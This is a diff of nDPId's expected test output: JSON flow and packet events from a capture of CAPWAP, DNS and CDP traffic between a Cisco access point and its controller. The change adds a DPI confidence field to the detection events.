-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1422328963915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1422328963915,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAEAAP8R8PTAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"cisco-capwap-controller","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328963915,"flow_last_seen":1422328963915,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1422328963915,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"cisco-capwap-controller","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1422328966914,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"ts_msec":1422328966914,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFAABFAAIAAP8R8PPAqAoK\/\/\/\/\/8BrADUAMQAA9LUBAAABAAAAAAAAF0NJU0NPLUNBUFdBUC1DT05UUk9MTEVSAAABAAE="}
 00763{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":365,"pkt_type":351,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":365,"pkt_l4_len":0,"ts_msec":1422328970067,"pkt":"AQAMzMzMuDhh8wWsAV+qqgMAAAwgAAK0db0AAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAUR2lnYWJpdEV0aGVybmV0MAAEAAgAAAADAAsABQE="}
 00164{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":4,"source":"capwap.pcap","alias":"nDPId-test","layer_type":351}
@@ -20,35 +20,35 @@
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":12,"source":"capwap.pcap","alias":"nDPId-test","layer_type":383}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1422329005766,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1422329005766,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAARAAP8Rr9\/AqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g6AAAAAEAAGYAABQAAQAAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1422329005766,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1422329005766,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"ts_msec":1422329005766,"pkt":"\/\/\/\/\/\/\/\/uDhh8wWsCABFwACXAARAAP8Rr9\/AqAoK\/\/\/\/\/zBcFH4AgwAAACACEAAAAAAGWAogaQ4g6AAAAAEAAGYAABQAAQAAJwAoAgIAAQBAlgAAAAAEAQAAAABAlgAAAQAEBwVmAABAlgAAAgAEDAQZAAApAAEEACwAAQEAJQAKAECWAADPAQAAAQAlABYAQJYAAAVBUGI4MzguNjFmMy4wNWFj"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":180000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1422329005767,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"ts_msec":1422329005767,"pkt":"uDhh8wWsJOmzR64gCABFwACOANoAAH8RpGHAqAoJwKgKChR+MFwAegAAABACAAAAAAAAAAACAABlAAABACQAAAPoAAAABQIBAAMAQJYAAAEABAcFZgAAQJYAAAAABAEAAAEABAAJQ2lzY28yNTA0BBgABQAAAAAAAAoABsCoCgkAAAAlAAcAQJYAANAAACUACwBAlgAAl1THBF8A"}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":180000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329005767,"flow_last_seen":1422329005767,"flow_idle_time":180000,"flow_min_l4_payload_len":114,"flow_max_l4_payload_len":114,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1422329005767,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
 00579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1422329005767,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"ts_msec":1422329005767,"pkt":"uDhh8wWsJOmzR64gCABFwACOANsAAH8RpGDAqAoJwKgKChR+MFwAegAAABACAAAAAAAAAAACAABlAAABACQAAAPoAAAABQIBAAMAQJYAAAEABAcFZgAAQJYAAAAABAEAAAEABAAJQ2lzY28yNTA0BBgABQAAAAAAAAoABsCoCgkAAAAlAAcAQJYAANAAACUACwBAlgAAl1THBF8A"}
 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1422329015765,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1422329015765,"pkt":"JOmzR64guDhh8wWsCABFwABlAAVAAP8R5V7AqAoKwKgKCTBcFH4AURfgAQAAABb+\/wAAAAAAAAAAADgBAAAsAAAAAAAAACz+\/1Z4mrz13vIlLHFGU8KNmBPwkXkcj0vpbAEOfTafYoZSAAAABAAvADMBAA=="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1422329017533,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"ts_msec":1422329017533,"pkt":"JOmzR64guDhh8wWsCABFwABsAAFAAEARpFzAqAoKwKgKCTBcFH8AWAAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFKDMU3RsAQJYlAAEcq6fyE50AAEcACwAFJ\/9UIA8C1d0="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422329017533,"flow_last_seen":1422329017533,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1422329017533,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1422329018033,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1422329018033,"pkt":"JOmzR64guDhh8wWsCABFwADDAAJAAEARpATAqAoKwKgKCTBcFH8ArwAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFL9Qy3RsAQJYlAAEcq6fyE50AAEkACwAFKFJLQAQC3ePdGwBAliUAARyrp\/ITnQAAHQALAAUtdhsgDQK\/xN0bAECWJQABHKun8hOdAAAOAAsABS9iq+AIAt7o3RsAQJYlAAEcq6fyE50AAAwACwAFL7WkAA0C3+g="}
 00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1422329018533,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"ts_msec":1422329018533,"pkt":"JOmzR64guDhh8wWsCABFwAEaAANAAEARo6zAqAoKwKgKCTBcFH8BBgAAACADIAAAAAABBAAAAAAAAABAAABYCiBpDiAAAAAAAABYCiBpDiAAAN0JAECWJQEFN3Va3RsAQJYlAAEcq6fyE50AACMACwAFMGt3IAoC5+ndGwBAliUAARyrp\/ITnQAAEwALAAUwdLNADQLo6d0bAECWJQABZICZPC30AAADAAsABTJ3KPD9AqWm3RsAQJYlAAH4Ht\/dIQ8AAB8ACwAFNejwUJoCvcLdGwBAliUAAfge390hDwAAEgALAAU2FOxglQK9wt0bAECWJQAB+B7f3SEPAAAcAAsABTZHxnCRAr\/A3RsAQJYlAAH4Ht\/dIQ8AAAcACwAFN246sJsCvr4="}
 00797{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":192,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"ts_msec":1422329034072,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="}
 00166{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":192,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375}
-00649{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":206,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1422329046533,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":206,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1422329046533,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
 00577{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":235,"source":"capwap.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1422328963915,"flow_last_seen":1422328966914,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1422329057031,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":49259,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00797{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":293,"source":"capwap.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":389,"pkt_type":375,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":389,"pkt_l4_len":0,"ts_msec":1422329091711,"pkt":"AQAMzMzMuDhh8wWsAXeqqgMAAAwgAAK0KHQAAQAUQVBiODM4LjYxZjMuMDVhYwAFAPJDaXNjbyBJT1MgU29mdHdhcmUsIEMyNjAwIFNvZnR3YXJlIChBUDNHMi1LOVc4LU0pLCBWZXJzaW9uIDE1LjIoNClKQTEsIFJFTEVBU0UgU09GVFdBUkUgKGZjMikKVGVjaG5pY2FsIFN1cHBvcnQ6IGh0dHA6Ly93d3cuY2lzY28uY29tL3RlY2hzdXBwb3J0CkNvcHlyaWdodCAoYykgMTk4Ni0yMDEzIGJ5IENpc2NvIFN5c3RlbXMsIEluYy4KQ29tcGlsZWQgVHVlIDMwLUp1bC0xMyAyMjo1NyBieSBwcm9kX3JlbF90ZWFtAAYAG2Npc2NvIEFJUi1DQVAyNjAySS1RLUs5AAIAEQAAAAEBAcwABMCoCgoAAwAWR2lnYWJpdEV0aGVybmV0MC4xAAQACAAAAAMACwAFAQAQAAY8KAAZABCkjQABAAA8KAAAMsg="}
 00166{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":293,"source":"capwap.pcap","alias":"nDPId-test","layer_type":375}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":310,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1422329099530,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":310,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":186,"flow_first_seen":1422329005767,"flow_last_seen":1422329092508,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":43985,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1422329099530,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":329,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1422329017533,"flow_last_seen":1422329109030,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":15026,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1422329109540,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1422329121530,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":310,"source":"capwap.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1422329005766,"flow_last_seen":1422329005766,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1422329099530,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"255.255.255.255","src_port":12380,"dst_port":5246,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":310,"source":"capwap.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":186,"flow_first_seen":1422329005767,"flow_last_seen":1422329092508,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":1457,"flow_tot_l4_payload_len":43985,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1422329099530,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12380,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":329,"source":"capwap.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1422329017533,"flow_last_seen":1422329109030,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":15026,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1422329109540,"l3_proto":"ip4","src_ip":"192.168.10.10","dst_ip":"192.168.10.9","src_port":12380,"dst_port":5247,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1422329121530,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CAPWAP","breed":"Acceptable","category":"Network"}}
